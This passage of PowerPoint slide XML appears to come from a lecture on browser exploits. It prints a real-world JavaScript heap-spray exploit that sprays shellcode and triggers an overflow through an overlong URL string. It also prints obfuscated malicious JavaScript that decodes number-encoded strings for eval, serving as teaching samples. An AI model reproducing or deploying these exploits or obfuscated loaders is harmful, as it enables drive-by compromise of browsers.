              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    for (i=0;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>heapBlocks;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      memory[i] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    try</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> a=new Array(813);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> b=new Array(227);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      a=a+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      a=a+b+"a0wa0wa0wa0wa0wa0wa0wa0wjjjjjjjjjjjjjjjjjjN8wvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccN";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      a=a+"N8wV8d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>JkIkBBs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(ss&amp;hsFFRECCvPAQdsezxCDDf%4ss#";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      xskj.URL=a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    catch(e){}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700" dirty="0"/>
              <a:t>    function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>getSpraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlideSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      while (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>*2&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlideSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(0,spraySlideSize/2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>  &lt;/BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7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33528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life example of heap spraying from hxxp://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ournature.net/12.htm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>as of March 2010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4933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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ZCLTWYUnb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>cTFkV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){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FdjfKh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=2,QuJ=6;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>XucjYGqSlM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='43-2,58-2,57-2,61-2,55-4,59-4,57-0,34-0,63-0,58-2,56-4,62-0,58-0,43-4,39-4,34-0,58-0,57-0,58-2,57-4,58-0,62-0,43-4,39-4,34-0,56-0,60-2,61-2,56-4,57-0,',JMMPBaqk=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>XucjYGqSlM.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(',');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pjvAatxyL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='';function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>UtjitjXLj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c);}for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>MpxsUy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=(JMMPBaqk.length-1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>MpxsUy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>&gt;=(0x30+0x25+0x2b-0x80);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>MpxsUy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-=-0x5-0xf-0x2-0x1a+0x1+0xa+0x26){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>RSPPmhPq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JMMPBaqk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>MpxsUy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>].split('-');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JqPqcj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RSPPmhPq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[0]*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>QuJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)+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RSPPmhPq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JqPqcj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JqPqcj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>FdjfKh;pjvAatxyL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>UtjitjXLj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JqPqcj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-(-0x9+0x23-0xf-0x2e+0x2a+0x3f))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pjvAatxyL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;}if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pjvAatxyL.charCodeAt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( pjvAatxyL.length-1) == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pjvAatxyL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pjvAatxyL.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(0, pjvAatxyL.length-1);return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pjvAatxyL.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(/^\s+|\s+$/g, '');}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>wmLnJkkl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>SRosjALT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>window.eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(); } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Gyj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>SnD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){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wqv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=6,NEqWQuULa=4;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ThsGMFxhVh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='276-0,196-2,177-0,153-0,258-0,276-0,250-2,268-2,256-2,252-0,271-2,276-0,255-0,256-2,276-0,196-2,177-0,153-0,277-2,276-0,253-2,196-2,163-2,261-0,279-0,279-0,273-0,192-0,175-2,175-2,',JDQ=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ThsGMFxhVh.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(',');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bwk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='';function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KHaUjYH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c);}for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KeOaRfh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=(JDQ.length-1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KeOaRfh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>&gt;=(-0x1c+0x22+0x2f-0x25-0x10);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KeOaRfh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-=0x24+0x1b+0x10+0x1e-0x17-0x55){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>OQELOxB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=JDQ[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KeOaRfh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>].split('-');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>xztQseR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OQELOxB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[0]*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>NEqWQuULa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)+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OQELOxB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>xztQseR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xztQseR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>wqv;Bwk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>KHaUjYH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>xztQseR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-(0x3-0x32-0x26+0x9b))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bwk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;}if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bwk.charCodeAt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( Bwk.length-1) == 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bwk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bwk.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(0, Bwk.length-1);return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Bwk.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(/^\s+|\s+$/g, '');}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>fFZJVnqJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JpsGUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){ 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EYOn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=new Function("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>QwprP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>", "return 509037;");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EYOn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=new Function("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>QwprP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>", "return 509037;"); } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>xjAZB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>dyPvvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>){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tZvoA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=5,ymseWXvItL=6;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>QsNmDdKF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='154-1,150-5,141-4,139-1,150-0,155-0,145-0,155-5,96-4,140-5,150-5,149-1,97-3,145-5,150-0,103-2,96-4,151-4,145-0,151-4,90-5,110-0,108-2,97-3,145-5,143-2,153-2,139-1,149-1,142-3,',OSnnUZqhRA=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>QsNmDdKF.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(',');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>uoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>='';function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>CbjsbW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(c);}for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JaL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=(OSnnUZqhRA.length-1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JaL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>&gt;=(0x31+0x1a-0x4b);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>JaL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>-=0xe-0xe-0x1d-0x1a-0x26+0x8+0x56){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>HwnJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>OSnnUZqhRA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
